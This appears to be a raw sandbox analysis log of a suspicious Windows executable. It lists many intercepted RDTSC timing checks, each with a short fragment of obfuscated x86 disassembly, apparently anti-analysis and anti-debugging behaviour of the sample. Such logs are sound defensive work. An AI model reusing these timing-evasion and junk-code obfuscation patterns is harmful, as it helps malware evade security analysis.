Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D700D3 second address: 4D700D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D700D9 second address: 4D700DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D7033C second address: 4D70358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70358 second address: 4D7035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D7035C second address: 4D70362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70362 second address: 4D70382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70382 second address: 4D70388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D90821 second address: 4D90827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D90827 second address: 4D9082B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D9082B second address: 4D908DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e jmp 00007FC9D915F4C6h 0x00000013 mov eax, dword ptr [774365FCh] 0x00000018 jmp 00007FC9D915F4C0h 0x0000001d test eax, eax 0x0000001f pushad 0x00000020 jmp 00007FC9D915F4BEh 0x00000025 pushfd 0x00000026 jmp 00007FC9D915F4C2h 0x0000002b jmp 00007FC9D915F4C5h 0x00000030 popfd 0x00000031 popad 0x00000032 je 00007FCA4B782577h 0x00000038 jmp 00007FC9D915F4BEh 0x0000003d mov ecx, eax 0x0000003f pushad 0x00000040 mov si, C00Dh 0x00000044 push eax 0x00000045 push edx 0x00000046 call 00007FC9D915F4C8h 0x0000004b pop esi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D908DB second address: 4D90969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor eax, dword ptr [ebp+08h] 0x00000008 jmp 00007FC9D8BCC16Dh 0x0000000d and ecx, 1Fh 0x00000010 pushad 0x00000011 mov ebx, eax 0x00000013 pushfd 0x00000014 jmp 00007FC9D8BCC178h 0x00000019 or esi, 6444F2E8h 0x0000001f jmp 00007FC9D8BCC16Bh 0x00000024 popfd 0x00000025 popad 0x00000026 ror eax, cl 0x00000028 jmp 00007FC9D8BCC176h 0x0000002d leave 0x0000002e jmp 00007FC9D8BCC170h 0x00000033 retn 0004h 0x00000036 nop 0x00000037 mov esi, eax 0x00000039 lea eax, dword ptr [ebp-08h] 0x0000003c xor esi, dword ptr [00A52014h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push eax 0x00000045 lea eax, dword ptr [ebp-10h] 0x00000048 push eax 0x00000049 call 00007FC9DCF4CAC4h 0x0000004e push FFFFFFFEh 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FC9D8BCC177h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D90969 second address: 4D909A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC9D915F4C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909A3 second address: 4D909A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909A7 second address: 4D909AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909AD second address: 4D909B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909B3 second address: 4D909B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909B7 second address: 4D909F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FC9DCF4CB2Fh 0x00000010 mov edi, edi 0x00000012 jmp 00007FC9D8BCC174h 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC9D8BCC177h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D909F0 second address: 4D90A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC9D915F4C1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ecx, 086AECA3h 0x00000016 mov ch, AFh 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FC9D915F4BBh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov esi, 71DAFF3Dh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40036 second address: 4D4003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4003A second address: 4D4003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4003E second address: 4D40044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40044 second address: 4D400AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FC9D915F4BEh 0x0000000b adc cx, DA18h 0x00000010 jmp 00007FC9D915F4BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e pushfd 0x0000001f jmp 00007FC9D915F4BBh 0x00000024 adc ecx, 46014EDEh 0x0000002a jmp 00007FC9D915F4C9h 0x0000002f popfd 0x00000030 pop eax 0x00000031 mov edi, 676CEA54h 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D400AB second address: 4D400AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D400AF second address: 4D40146 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC9D915F4C5h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007FC9D915F4C1h 0x00000010 sub esi, 2375AE76h 0x00000016 jmp 00007FC9D915F4C1h 0x0000001b popfd 0x0000001c popad 0x0000001d and esp, FFFFFFF8h 0x00000020 pushad 0x00000021 jmp 00007FC9D915F4BCh 0x00000026 pushfd 0x00000027 jmp 00007FC9D915F4C2h 0x0000002c and ax, 22C8h 0x00000031 jmp 00007FC9D915F4BBh 0x00000036 popfd 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 jmp 00007FC9D915F4C6h 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 mov ecx, edi 0x00000044 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40146 second address: 4D4014A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4014A second address: 4D40176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, E16Ch 0x0000000a popad 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dl, C2h 0x00000010 mov esi, 06D8690Fh 0x00000015 popad 0x00000016 push eax 0x00000017 call 00007FC9D915F4BBh 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40176 second address: 4D4017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4017A second address: 4D4017E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4017E second address: 4D40184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40184 second address: 4D401D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9D915F4C6h 0x00000009 or si, 6D18h 0x0000000e jmp 00007FC9D915F4BBh 0x00000013 popfd 0x00000014 call 00007FC9D915F4C8h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D401D2 second address: 4D401D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D401D6 second address: 4D401DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D401DA second address: 4D401E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D401E0 second address: 4D4023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov ebx, eax 0x0000000f popad 0x00000010 mov ebx, dword ptr [ebp+10h] 0x00000013 pushad 0x00000014 jmp 00007FC9D915F4C1h 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c call 00007FC9D915F4BCh 0x00000021 mov dx, si 0x00000024 pop esi 0x00000025 mov bx, E4B2h 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC9D915F4BFh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D4023E second address: 4D40244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40244 second address: 4D402E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov edi, 536235E0h 0x0000000f pushfd 0x00000010 jmp 00007FC9D915F4C9h 0x00000015 add ch, FFFFFFE6h 0x00000018 jmp 00007FC9D915F4C1h 0x0000001d popfd 0x0000001e popad 0x0000001f mov esi, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 call 00007FC9D915F4BCh 0x00000028 mov di, cx 0x0000002b pop eax 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FC9D915F4C2h 0x00000037 and ah, FFFFFFE8h 0x0000003a jmp 00007FC9D915F4BBh 0x0000003f popfd 0x00000040 jmp 00007FC9D915F4C8h 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 mov al, bl 0x0000004a mov ch, FCh 0x0000004c popad 0x0000004d xchg eax, edi 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 mov ah, 1Dh 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D402E5 second address: 4D402EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D308C3 second address: 4D3094F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9D915F4C8h 0x00000009 or esi, 21535798h 0x0000000f jmp 00007FC9D915F4BBh 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d mov ax, E347h 0x00000021 push esi 0x00000022 call 00007FC9D915F4C3h 0x00000027 pop esi 0x00000028 pop edx 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007FC9D915F4BFh 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FC9D915F4BBh 0x00000038 jmp 00007FC9D915F4C3h 0x0000003d popfd 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3094F second address: 4D30953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30953 second address: 4D30957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30957 second address: 4D3095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3095D second address: 4D30963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30963 second address: 4D30967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30967 second address: 4D3096B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3096B second address: 4D3097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3097D second address: 4D30982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30982 second address: 4D30991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30991 second address: 4D30995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30995 second address: 4D309A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, dx 0x0000000f mov esi, edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D309A7 second address: 4D309AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D309AD second address: 4D309B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D309B1 second address: 4D309B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D309B5 second address: 4D30A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c mov bx, E19Ah 0x00000010 popad 0x00000011 push esi 0x00000012 jmp 00007FC9D8BCC16Eh 0x00000017 mov dword ptr [esp], esi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC9D8BCC16Eh 0x00000021 and si, 3508h 0x00000026 jmp 00007FC9D8BCC16Bh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007FC9D8BCC178h 0x00000032 jmp 00007FC9D8BCC175h 0x00000037 popfd 0x00000038 popad 0x00000039 mov esi, dword ptr [ebp+08h] 0x0000003c pushad 0x0000003d push esi 0x0000003e mov eax, edi 0x00000040 pop edx 0x00000041 popad 0x00000042 mov ebx, 00000000h 0x00000047 jmp 00007FC9D8BCC16Eh 0x0000004c test esi, esi 0x0000004e jmp 00007FC9D8BCC170h 0x00000053 je 00007FCA4B241A9Dh 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30A63 second address: 4D30A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30A80 second address: 4D30AAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007FC9D8BCC16Ah 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30AAA second address: 4D30AF2 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC9D915F4BBh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov di, B12Ch 0x0000000e popad 0x0000000f mov ecx, esi 0x00000011 pushad 0x00000012 push edi 0x00000013 mov ecx, 44E2AF73h 0x00000018 pop ecx 0x00000019 push edx 0x0000001a mov cx, 99EBh 0x0000001e pop esi 0x0000001f popad 0x00000020 je 00007FCA4B7D4D89h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007FC9D915F4C8h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30AF2 second address: 4D30BCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [77436968h], 00000002h 0x00000010 jmp 00007FC9D8BCC176h 0x00000015 jne 00007FCA4B2419F2h 0x0000001b jmp 00007FC9D8BCC170h 0x00000020 mov edx, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FC9D8BCC16Dh 0x0000002a or eax, 058509D6h 0x00000030 jmp 00007FC9D8BCC171h 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebx 0x00000038 jmp 00007FC9D8BCC16Eh 0x0000003d push eax 0x0000003e pushad 0x0000003f mov dx, 4BA4h 0x00000043 mov esi, edi 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FC9D8BCC16Fh 0x0000004c xchg eax, ebx 0x0000004d jmp 00007FC9D8BCC176h 0x00000052 push eax 0x00000053 jmp 00007FC9D8BCC16Bh 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FC9D8BCC175h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30BCE second address: 4D30BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C2A second address: 4D30C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C2F second address: 4D30C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D915F4C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C4B second address: 4D30C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C4F second address: 4D30C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a mov dl, 74h 0x0000000c mov si, CE05h 0x00000010 popad 0x00000011 mov esp, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC9D915F4C7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C7B second address: 4D30C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC174h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C93 second address: 4D30C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C97 second address: 4D30CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30CA6 second address: 4D30CAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30CAC second address: 4D30CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30CB2 second address: 4D30CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40CBB second address: 4D40D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007FC9D8BCC177h 0x0000000c add ecx, 5A27DCFEh 0x00000012 jmp 00007FC9D8BCC179h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007FC9D8BCC171h 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FC9D8BCC16Eh 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a push ecx 0x0000002b mov cx, di 0x0000002e pop edi 0x0000002f pushfd 0x00000030 jmp 00007FC9D8BCC176h 0x00000035 and ax, 1588h 0x0000003a jmp 00007FC9D8BCC16Bh 0x0000003f popfd 0x00000040 popad 0x00000041 pop ebp 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov dx, 81F6h 0x00000049 movsx edi, si 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40D5A second address: 4D40D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40D60 second address: 4D40D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
